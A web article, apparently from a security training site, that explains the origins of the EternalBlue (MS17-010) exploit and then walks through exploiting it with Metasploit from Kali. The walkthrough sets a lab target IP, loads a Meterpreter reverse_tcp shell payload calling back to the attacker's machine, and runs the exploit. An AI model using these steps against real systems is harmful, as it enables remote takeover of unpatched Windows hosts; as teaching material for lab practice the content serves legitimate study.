Scroll Top

Eternal Blue Exploit | Windows Vulnerability | MS17-010

windo

EternalBlue  Exploit

EternalBlue is both the given name to a series of Microsoft software vulnerabilities and the exploit created by the NSA as a cyberattack tool. Although the EternalBlue exploit , officially named MS17-010 by Microsoft,  affects only Windows operating systems, anything that uses the SMBv1 (Server Message Block version 1) file-sharing protocol is technically at risk of being targeted for ransomware and other cyberattacks.

 The origins of the SMB vulnerability are what spy stories are made of — dangerous NSA hacking tools leaked, a notorious group called Shadow Brokers on the hunt for common vulnerabilities and exposures, and a massively popular operating system used by individuals, governments, and corporations worldwide. 

According to  statements made by Microsoft, EternalBlue was developed by the United State’s National Security Agency as part of their controversial program of stockpiling and weaponizing cybersecurity vulnerabilities, rather than flagging them to the appropriate vendor. 

cyber security training 4

The NSA allegedly spent almost a year hunting for a bug in Microsoft’s software. Once they found it, the NSA developed EternalBlue to exploit the vulnerability. The NSA used EternalBlue for five years before alerting Microsoft of its existence. Microsoft has since called upon the NSA and other government bodies to support a Digital Geneva Convention, which calls for an end to nation-state stockpiling of software vulnerabilities.

EternalBlue  used  in  cyberattacks

EternalBlue has been famously used to spread WannaCry and Petya ransomware. But the exploit can be used to deploy any type of cyberattack, including cryptojacking and worm-like malware. The NSA hack opened the door for any attacker to send a malicious packet to a vulnerable server that has not applied the patch to fix CVE-2017-0144.

STEP  1:The first thing we need to do is open up Kali and type #msfconsole terminal and start Metasploit. 

msf 5>search eternalblue

STEP  2:Next, use the search command within Metasploit to locate a suitable module to use.There is an auxiliary scanner that we can run to determine if a target is vulnerable to MS17-010. It’s always a good idea to perform the necessary recon like this.

use: exploit/windows/smb/ms17_010_eternalblue

STEP  3: Run the module and with the  Options command.

STEP  4: Now we need to specify the IP address of the target.

        set  RHOSTS 192.168.255.130      (Target IP)

STEP  5: Next, we can load the  reverse_tcp shell as the payload.

  Set payload windows/x64/meterpreter/reverse_tcp.

STEP  6:Finally, set the listening host to the IP address of our local machine.

Set LHOST 192.168.255.141           (Your IP )

STEP  7: Now the only thing left to do is launch the exploit. Use the run command to fire it off.

                             >ifconfig

Privacy Preferences
When you visit our website, it may store information through your browser from specific services, usually in form of cookies. Here you can change your privacy preferences. Please note that blocking some types of cookies may impact your experience on our website and the services we offer.